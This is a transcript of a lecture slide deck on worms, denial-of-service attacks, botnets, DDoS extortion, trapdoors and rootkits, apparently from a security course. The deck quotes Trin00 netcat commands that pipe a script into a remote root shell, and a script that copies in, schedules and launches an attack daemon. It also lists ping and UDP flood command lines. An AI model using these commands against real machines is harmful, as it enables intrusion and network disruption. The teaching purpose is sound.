1 / 44

Worms, DDOS, and Botnets

Worms, DDOS, and Botnets. Wide-spread Internet attacks. Worms. Active network propagation Replicates (like a virus) Operates independently of users Compromise remote machines Insecure services Copy themselves to that machine. Morris Worm. Released on Nov 2, 1988

Download Presentation

Worms, DDOS, and Botnets

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Worms, DDOS, and Botnets Wide-spread Internet attacks

  2. Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromise remote machines • Insecure services • Copy themselves to that machine

  3. Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable

  4. Morris Worm • Where to spread • netstat -r -n • /etc/hosts • Yellow pages distributed hosts file • Tries all local addresses

  5. Morris Worm • Security flaws to exploit • Weak password for rsh • Buffer overflow in fingerd program • Trapdoor in sendmail mail handler • DEBUG mode

  6. Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley

  7. Morris Worm • Effects • Resource exhaustion, disconnection, isolation • $10-100M damage • Bug in the worm • Robert? • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction! • 3 years probation • 400 hours of community service • $10,000 fine

  8. Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Using Microsoft’s Internet Information Server • Using buffer overflows • Propagation • Checks IP addresses on port 80 of the PC to see if the web server is vulnerable

  9. Denial of Service • Loss of “availability” • Regular use is stopped • A more advanced attack • Version 1 is insecure • Version 2 is secure, but backwards compatible • DOS version 2 • Forces people to use version 1 • Attack those people

  10. Old Attacks • Error handling • Failures caused system crashes • Ping of Death • ICMP Packets big enough to fragment • Teardrop • Manipulate the offset in fragmented pkts • Land Attack • Same Source and IP

  11. Old Attacks • Looping • Smurf attack • Ping to broadcast address • echo/chargen • Echo is a service that repeats what you send • Chargen is a service that generates characters • A command (spoofed) from the machine with Echo is sent to the chargen service. • Boom!

  12. DoS Attacks • General security principle • Robustness to normal inputs • Robustness to attacks ≠

  13. SYN/ACK LAND Attack Source IP: 129.107.94.136 Source Port: 22 Dest. IP: 129.107.94.136 Dest. Port: 22 SYN 129.107.94.136

  14. Teardrop Attack • IP fragmentation • Fragment offset • NFB: amount of data in 1st packet Packet 1 More fragments: 1 Frag. offset: 0 Packet 2 Frag. offset: 0 + NFB

  15. Teardrop Attack • Attack • Simply a bad offset Packet 1 More fragments: 1 Frag. offset: 0 Packet 2 Frag. offset: 2354692110

  16. Smurf Attack • ICMP • Ping • Leverage 129.16.33.* Source IP: 129.107.94.136 Ping: 129.16.33.255 129.107.94.136

  17. Network DOS • ARP attacks • Change the router’s advertised Ethernet address to anything else.

  18. Lessons Learned? • Many equivalent attacks today • Look at CERT alerts • Many are DOS vulnerabilities • Usually software errors • We’re still bad at handling malformed inputs • Unnecessary services • Many have been taken away (generally) • More keep popping up

  19. Flooding • A Classic Attack • Just send traffic: mail bomb, SYN floods, ICMP • Generally works • If you block the bad traffic, I’ll flood the blocker • Need to block it from at least 1 hop away

  20. The Attacker’s Problems • Easily Detectable • IP spoofing? • Works less and less (egress filters) • Partial traceback available • Weak • Amazon.com • Built to handle lots of traffic • One flooder is a blip on the radar

  21. BotNets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No intense firewall hacking • or other dangerous, difficult tasks • Software and OS are homogeneous • 10,000 to 1.5 million

  22. Anatomy of a Zombie • What would you put into a bot? • Infect and spread • Covert • Make money

  23. Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundIl.exe (rundIl.exe -- note the ‘eye’) • Check the font in your Windows registry • Connection • E.g. IRC server • Join a secret, password protected channel • Wait for instructions • Download a trojan • Attack on command • with or without trojan

  24. Anatomy of UNIX Zombies • Linux/Solaris • Many root kits and network sniffers available • Automatically • Scan for vulnerable services • Attempt attacks • Open a port to listen for “owned” machines • (e.g., port 1524 “ingresslock” service) • Alternatively mail to a freemail account • Install attackware on these machines

  25. Sample Connections: Trin00 • This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp: • ------------------------------------------------------------------------ • ./trin.sh | nc 128.aaa.167.217 1524 & • ./trin.sh | nc 128.aaa.167.218 1524 & • ./trin.sh | nc 128.aaa.167.219 1524 & • ./trin.sh | nc 128.aaa.187.38 1524 & • ./trin.sh | nc 128.bbb.2.80 1524 & • ./trin.sh | nc 128.bbb.2.81 1524 & • ./trin.sh | nc 128.bbb.2.238 1524 & • ./trin.sh | nc 128.ccc.12.22 1524 & • ./trin.sh | nc 128.ccc.12.50 1524 & • . . . • ------------------------------------------------------------------------

  26. Sample Script • The script "trin.sh", whose output is being piped to these systems, looks like: • ------------------------------------------------------------------------ • #Remote copy of the “leaf” program to an unsuspicious location • echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen” • echo "chmod +x /usr/sbin/rpc.listen”#Make it executable • echo "echo launching trinoo" • echo "/usr/sbin/rpc.listen”#Run “leaf” • #Set it up as a Cron job. Restart it every minute. • echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron” • echo "crontab cron" • echo "echo launched" • echo "exit"

  27. Attack Topology Daemons Masters Attackers dns1.uta.edu sCUdATK www3.security.com mail.company.com ^^hATEr^^

  28. Attack Topology • Master’s Characteristics • Easy to hide • lots of accounts • lots of traffic • Should use a r00t kit to hide your tracks • Important Systems • Sys admin reluctant to take it down • DNS server, mail server, etc.

  29. New Topologies • Trin00 • IRC: No master to catch • Conficker • Rotating Web sites • Storm • Structured P2P

  30. Other Uses of Botnets • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use

  31. Script Kiddies • Non-expert Attackers • Trin00 and other DDOS attack tools have well-defined signatures • Fixed port numbers • Fixed & clear-text passwords • Known commands • Crontab entries • File locations • Sys Admins can find these • Experts can avoid them

  32. Distributed DOS = DDOS • Step 1 • Get as large a botnet as you can • Step 2 • Flood the target full blast from every zombie • IP spoofing? • Yes: harder to trace back • No: could get blocked by egress filters • No: you didn’t hack the boxes directly; hard to trace.

  33. Methods of Blasting 1 • Brute Force • ping.exe 127.10.10.1 -l 65500 -n 10000 • Send 10K large pings • udp 127.10.10.1 9999999 0 • This sends huge packets, no delay • 1500-byte fragments result • Characteristics • These can be run on Windows cmd line • Pure brute force bandwidth consumption

  34. Real World DDoS 0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0 0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0 0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0 0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0 0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0 0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0 0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661 0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0 0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0 0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0 0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0 0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0 0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0 0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0 0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0

  35. SYN=1, seq=963 SYN=1, seq=382, ack=964 SYN=0, seq=964, ack=383 Methods of Blasting 2 • TCP 3-way handshake State LISTEN SYN_RCVD ESTAB.

  36. SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 Methods of Blasting 2 • TCP 3-way handshake State LISTEN

  37. Methods of Blasting 2 • Server • Enters the SYN_RCVD state • Limited # of connections allowed • Legit users can’t connect • Fix 1: allow more connections • Attack on Fix 1: Memory, processing, and bandwidth • Syn Flood • Open a TCP connection (SYN) • Don’t respond to the SYN/ACK • Repeat!

  38. Methods of Blasting 2 • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back • Unless spoofed IP • But far less than sent, on average

  39. Making $$DDOS$$ Pay • No big targets • Publicity is good marketing but bad for avoiding arrest • Easier to take small targets down • Advertise • Company B would pay to have Company A’s website go down • Extorsion: pay us or else

  40. Defenses • Filtering - how • SYN floods: check for repeated IPs • Often non-production ports • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response can drop by several seconds • Pay the Extortion fees

  41. Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?

  42. Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.

  43. Trapdoors • Examples • Special account to avoid password • Special sequence to avoid access control • Cause of trapdoors • Forgotten • Intentionally left in the program for testing • Intentionally left for maintenance • Intentionally leave them as a covert means of access to the component

  44. Rootkits and Backdoors • Backdoor: an open passage into a system • Ex: A root shell listening on a high port • Usually, it is disguised in some fashion. • Rootkit: a complete backdoor system • used to hide one or more backdoors • modify system logs, binaries, etc., to hide its presence.

More Related